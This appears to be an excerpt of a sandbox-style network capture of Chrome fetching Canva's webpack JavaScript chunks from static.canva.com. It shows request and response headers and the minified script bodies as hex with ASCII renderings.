                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1195INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 30 34 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 37 37 34 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7045],{/***/ 277425:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1034INData Raw: 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 72 65 63 74 20 78 3d 22 37 22 20 79 3d 22 35 22 20 77 69 64 74 68 3d 22 33 22 20 68 65 69 67 68 74 3d 22 31 34 22 20 72 78 3d 22 31 2e 35 22 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 34 22 20 79 3d 22 35 22 20 77 69 64 74 68 3d 22 33 22 20 68 65 69 67 68 74 3d 22 31 34 22 20 72 78 3d 22 31 2e 35 22 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2f 3e 3c 2f 73 76 67 3e 27 3b 5f 5f 63 2e 70 50 61 3d 27 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 66 69 6c 6c 3d 22 6e
                                                                                                                                                                                                                                                                    Data Ascii: w.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><rect x="7" y="5" width="3" height="14" rx="1.5" fill="currentColor"/><rect x="14" y="5" width="3" height="14" rx="1.5" fill="currentColor"/></svg>';__c.pPa='<svg width="24" height="24" fill="n


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    45192.168.2.1249768104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/570ea329b63c4775.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 7317
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951097ca30c92-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "cf52a438fe0a9d28119b078611a24bcb"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:17 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 8knn/YBP/NinW9bR+vYms+kFtBtgDXuanYnJW47IpZD4TWPwnwyDlVXLMUsVBBVzJwZcirEdu0E=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HA0QAFHCKE0NC
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 1jlfdIl.Zg6YF9wUvqxsC6CLMdlzNph_
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 39 77 48 25 32 46 25 32 42 65 46 78 66 53 65 69 53 57 35 67 31 52 79 6d 6f 66 58 41 78 25 32 46 45 38 4c 78 4e 4c 62 25 32 46 62 73 76 76 66 58 75 6a 52 4c 44 35 51 4b 66 35 77 48 51 6a 79 49 69 77 53 42 76 5a 47 55 7a 33 54 4f 6a 58 74 69 78 33 39 37 66 70 76 25 32 46 6b 46 6c 72 72 6c 34 48 46 48 59 42 65 63 46 4e 34 52 67 4a 51 68 31 58 7a 32 75 47 43 53 77 38 66 46 75 35 4a 4b 47 5a 47 65 79 74 6f 59 31 7a 5a 53 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wH%2F%2BeFxfSeiSW5g1RymofXAx%2FE8LxNLb%2FbsvvfXujRLD5QKf5wHQjyIiwSBvZGUz3TOjXtix397fpv%2FkFlrrl4HFHYBecFN4RgJQh1Xz2uGCSw8fFu5JKGZGeytoY1zZSk%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1195INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 32 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 32 31 34 34 36 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4221],{/***/ 121446:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 69 63 65 28 64 29 29 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 51 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 52 70 61 28 61 2e 63 6f 64 65 50 6f 69 6e 74 41 74 28 62 29 29 3b 63 6f 6e 73 74 20 64 3d 5b 5d 3b 66 6f 72 28 62 2b 3d 31 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 65 3d 61 2c 66 3d 62 2d 31 3b 69 66 28 21 28 35 35 32 39 36 3c 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 26 35 36 33 31 39 3e 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 29 26 26 35 36 33 32 30 3c 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 2b 31 29 26 26 35 37 33 34 33 3e 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 66 2b 31 29 29 29 7b 65 3d 52 70 61 28 61 2e 63 6f 64 65 50 6f 69 6e 74 41 74 28 62 29 29 3b 69 66 28 32 3d 3d 3d 63 26 26
                                                                                                                                                                                                                                                                    Data Ascii: ice(d));return b};Qpa=function(a,b){var c=Rpa(a.codePointAt(b));const d=[];for(b+=1;b<a.length;b++){var e=a,f=b-1;if(!(55296<=e.charCodeAt(f)&&56319>=e.charCodeAt(f)&&56320<=e.charCodeAt(f+1)&&57343>=e.charCodeAt(f+1))){e=Rpa(a.codePointAt(b));if(2===c&&
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 71 61 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 21 63 26 26 69 69 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 69 69 28 22 72 65 63 74 22 2c 7b 72 65 66 3a 66 7d 29 7d 29 2c 69 69 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 63 3f 76 6f 69 64 20 30 3a 60 75 72 6c 28 23 24 7b 65 7d 29 60 2c 63 68 69 6c 64 72 65 6e 3a 64 7d 29 5d 7d 29 7d 3b 62 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 6e 75 6c 6c 21 3d 61 2e 6e 61 6d 65 3f 60 43 6c 69 70 70 69 6e 67 43 6f 6e 74 61 69 6e 65 72 28 24 7b 61 2e 6e 61 6d 65 7d 29 60 3a 0a 22 43 6c 69 70 70 69 6e 67 43 6f 6e 74 61 69 6e 65 72 22 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 5f 63 2e 4e 70 61 3d 7b 64 61 74 65 3a 7b 77 65 65 6b 64 61 79 3a 7b 77 65 65 6b 64 61 79 3a 22 6c 6f 6e 67 22 7d 2c 6d 65
                                                                                                                                                                                                                                                                    Data Ascii: qa,{children:[!c&&ii("clipPath",{id:e,children:ii("rect",{ref:f})}),ii("g",{clipPath:c?void 0:`url(#${e})`,children:d})]})};b.displayName=null!=a.name?`ClippingContainer(${a.name})`:"ClippingContainer";return b};__c.Npa={date:{weekday:{weekday:"long"},me
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 24 7b 74 68 69 73 2e 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 7d 64 70 70 78 29 60 29 2c 74 68 69 73 2e 6d 61 74 63 68 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 51 35 29 29 7d 51 6a 61 28 29 7b 74 68 69 73 2e 6d 61 74 63 68 26 26 28 74 68 69 73 2e 6d 61 74 63 68 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 51 35 29 2c 74 68 69 73 2e 6d 61 74 63 68 3d 76 6f 69 64 20 30 29 7d 67 65 74 20 76 61 6c 75 65 28 29 7b 76 61 72 20 61 3b 74 68 69 73 5b 6d 69 5d 2e 72 65 70 6f 72 74 4f 62 73 65 72 76 65 64 28 29 3b 76 61 72 20 62 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 62 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 74 68 69 73 2e 77 69 6e 64 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61
                                                                                                                                                                                                                                                                    Data Ascii: ${this.window.devicePixelRatio}dppx)`),this.match.addListener(this.Q5))}Qja(){this.match&&(this.match.removeListener(this.Q5),this.match=void 0)}get value(){var a;this[mi].reportObserved();var b;return null!==(b=null===(a=this.window)||void 0===a?void 0:a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 31 2c 36 39 32 39 32 2c 31 32 31 34 36 31 2c 31 32 31 34 37 36 2c 31 32 32 39 31 35 2c 31 32 32 39 31 36 5d 29 2c 5a 70 61 3d 5b 5b 37 36 38 2c 38 37 39 5d 2c 5b 31 31 35 35 2c 31 31 36 31 5d 2c 5b 31 34 32 35 2c 31 34 36 39 5d 2c 5b 31 35 35 32 2c 31 35 36 32 5d 2c 5b 31 36 31 31 2c 31 36 33 31 5d 2c 5b 31 37 35 30 2c 31 37 35 36 5d 2c 5b 31 37 35 39 2c 31 37 36 34 5d 2c 5b 31 37 37 30 2c 31 37 37 33 5d 2c 5b 32 32 35 39 2c 32 32 37 33 5d 2c 5b 32 32 37 35 2c 32 33 30 36 5d 2c 5b 32 33 36 39 2c 32 33 37 36 5d 2c 5b 32 33 38 35 2c 32 33 39 31 5d 2c 5b 32 34 39 37 2c 32 35 30 30 5d 2c 0a 5b 32 36 33 35 2c 32 36 33 37 5d 2c 5b 32 37 35 33 2c 32 37 35 37 5d 2c 5b 32 38 31 30 2c 32 38 31 35 5d 2c 5b 33 31 33 34 2c 33 31 33 36 5d 2c 5b 33 31 34 32 2c 33 31 34
                                                                                                                                                                                                                                                                    Data Ascii: 1,69292,121461,121476,122915,122916]),Zpa=[[768,879],[1155,1161],[1425,1469],[1552,1562],[1611,1631],[1750,1756],[1759,1764],[1770,1773],[2259,2273],[2275,2306],[2369,2376],[2385,2391],[2497,2500],[2635,2637],[2753,2757],[2810,2815],[3134,3136],[3142,314
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC646INData Raw: 45 78 70 28 60 5b 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 5f 5f 63 2e 71 69 29 2e 6a 6f 69 6e 28 22 22 29 7d 5d 60 2c 22 67 22 29 3b 5f 5f 63 2e 71 71 61 3d 7b 2e 2e 2e 5f 5f 63 2e 71 69 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 78 32 37 3b 22 7d 3b 5f 5f 63 2e 72 71 61 3d 6e 65 77 20 52 65 67 45 78 70 28 60 5b 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 5f 5f 63 2e 71 71 61 29 2e 6a 6f 69 6e 28 22 22 29 7d 5d 60 2c 22 67 22 29 3b 76 61 72 20 64 71 61 3d 63 6c 61 73 73 7b 67 65 74 20 70 72 65 66 65 72 73 52 65 64 75 63 65 64 4d 6f 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 73 67 61 26 26 74 68 69 73 2e 73 67 61 2e 6d 61 74 63 68 65 73 7d 61 64 64 4c 69 73 74 65 6e 65 72 28 61 29 7b 76 61 72 20 62 3b 6e
                                                                                                                                                                                                                                                                    Data Ascii: Exp(`[${Object.keys(__c.qi).join("")}]`,"g");__c.qqa={...__c.qi,'"':"&quot;","'":"&#x27;"};__c.rqa=new RegExp(`[${Object.keys(__c.qqa).join("")}]`,"g");var dqa=class{get prefersReducedMotion(){return null!=this.sga&&this.sga.matches}addListener(a){var b;n


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    46192.168.2.1249770104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/950e236801028122.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 6002
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510b2c6043d0-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3dff60ff0a6bbd8440a5a22444dbb88c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:20 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: IzRjHMiIOmngm74baIVV0dZ7nQK5I1zaJxytyHmySq1/YJGuyH9rEr+NmBZqIoXieSSz27fOeRk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TQVEY934C5803
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bGIQzYxmSw0wQnH..A9IM1mYOESDGDeW
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4b 4c 76 25 32 42 31 45 4c 73 4d 61 63 78 34 6d 71 70 58 4a 39 4a 38 6a 67 70 45 37 67 61 70 61 44 33 30 73 69 39 5a 37 42 73 70 38 44 71 37 41 6d 33 6d 79 45 4e 75 63 4f 34 4d 68 49 77 37 68 4d 4b 78 33 6c 34 4d 71 79 36 36 75 51 25 32 42 54 35 35 59 4d 76 47 41 76 4b 6c 25 32 46 36 50 32 4d 69 4e 78 4a 50 31 52 53 25 32 42 52 6c 62 51 70 77 6c 42 6d 70 62 77 48 42 74 25 32 42 48 46 4d 74 43 6c 55 64 4a 68 6c 25 32 46 53 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLv%2B1ELsMacx4mqpXJ9J8jgpE7gapaD30si9Z7Bsp8Dq7Am3myENucO4MhIw7hMKx3l4Mqy66uQ%2BT55YMvGAvKl%2F6P2MiNxJP1RS%2BRlbQpwlBmpbwHBt%2BHFMtClUdJhl%2FSM%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 38 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 30 31 30 39 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3389],{/***/ 201099:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 65 3d 3e 60 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 29 7d 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 7d 60 29 2e 6a 6f 69 6e 28 22 26 22 29 3a 60 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 29 7d 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 29 7d 60 29 2e 6a 6f 69 6e 28 22 26 22 29 3b 72 65 74 75 72 6e 60 24 7b 61 2e 70 61 74 68 7d 3f 24 7b 62 7d 60 7d 3b 65 7a 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 32 37 38 32 29 3b 5f 5f 63 2e 4b 4f 61 3d 65 7a 2e 61 44 3b 5f 5f 63 2e 4c 4f 61 3d 65 7a 2e 4c 4f 3b 5f 5f 63 2e 66 7a 3d 65 7a 2e 7a 3b 5f 5f 63 2e 4d 4f 61 3d 65 7a 2e 67 78 3b 76 61 72 20 4e 4f 61 3d 4c 28 28 29 3d 3e 28 7b 6a
                                                                                                                                                                                                                                                                    Data Ascii: (e=>`${encodeURIComponent(c)}=${encodeURIComponent(e)}`).join("&"):`${encodeURIComponent(c)}=${encodeURIComponent(d)}`).join("&");return`${a.path}?${b}`};ez=__webpack_require__(42782);__c.KOa=ez.aD;__c.LOa=ez.LO;__c.fz=ez.z;__c.MOa=ez.gx;var NOa=L(()=>({j
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 70 6f 6e 73 65 22 2c 31 39 29 2c 6b 78 61 3a 57 28 22 6d 69 6e 74 41 74 74 22 2c 32 32 29 2c 70 33 62 3a 47 28 22 73 69 67 6e 75 70 4d 65 64 69 61 22 2c 33 32 2c 52 4f 61 29 2c 4f 64 3a 47 28 22 72 69 73 6b 43 6f 6e 74 65 78 74 22 2c 33 33 2c 68 7a 29 2c 74 41 61 3a 47 28 22 70 72 69 76 61 63 79 50 72 65 66 65 72 65 6e 63 65 73 22 2c 33 34 2c 54 4f 61 29 2c 53 54 62 3a 57 28 22 69 6e 63 6c 75 64 65 45 6e 63 72 79 70 74 65 64 4e 65 78 74 53 74 65 70 73 22 2c 33 36 29 2c 68 65 61 64 65 72 73 3a 28 30 2c 5f 5f 63 2e 6f 64 29 28 22 68 65 61 64 65 72 73 22 2c 33 38 29 2c 77 41 61 3a 4f 61 28 22 70 72 6f 64 75 63 74 53 75 69 74 65 22 2c 33 39 2c 5f 5f 63 2e 74 68 29 7d 29 29 3b 5f 5f 63 2e 6a 7a 3d 4c 28 28 29 3d 3e 28 7b 70 61 73 73 77 6f 72 64 3a 51 28 22 70
                                                                                                                                                                                                                                                                    Data Ascii: ponse",19),kxa:W("mintAtt",22),p3b:G("signupMedia",32,ROa),Od:G("riskContext",33,hz),tAa:G("privacyPreferences",34,TOa),STb:W("includeEncryptedNextSteps",36),headers:(0,__c.od)("headers",38),wAa:Oa("productSuite",39,__c.th)}));__c.jz=L(()=>({password:Q("p
